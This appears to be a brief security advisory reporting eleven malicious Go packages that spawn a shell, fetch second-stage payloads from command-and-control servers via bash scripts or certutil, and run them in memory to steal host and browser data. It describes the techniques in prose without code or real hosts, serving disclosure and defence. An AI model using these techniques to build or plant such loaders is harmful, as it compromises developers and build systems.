A set of 11 malicious Go packages has been discovered. These packages are designed to download and execute additional payloads from remote servers on both Windows and Linux systems. The code can spawn a shell, fetching second-stage payloads from command-and-control endpoints. The payloads can gather host information, access web browser data, and communicate with their servers. The structure of the Go ecosystem complicates security, allowing deceptive modules to appear credible, which increases the risk of unintentional integration of malicious code into development projects. This is believed to be the work of a single threat actor due to similarities in their command-and-control usage.
At runtime the code silently spawns a shell, pulls a second-stage payload from an interchangeable set of .icu and .tech command-and-control (C2) endpoints, and executes it in memory.
Because the second-stage payload delivers a bash-scripted payload for Linux systems and retrieves Windows executables via certutil.exe, both Linux build servers and Windows workstations are susceptible to compromise.
Attackers exploit the confusion, carefully crafting their malicious module namespaces to appear trustworthy at a glance, significantly increasing the likelihood developers inadvertently integrate destructive code into their projects.
Collection
[
|
...
]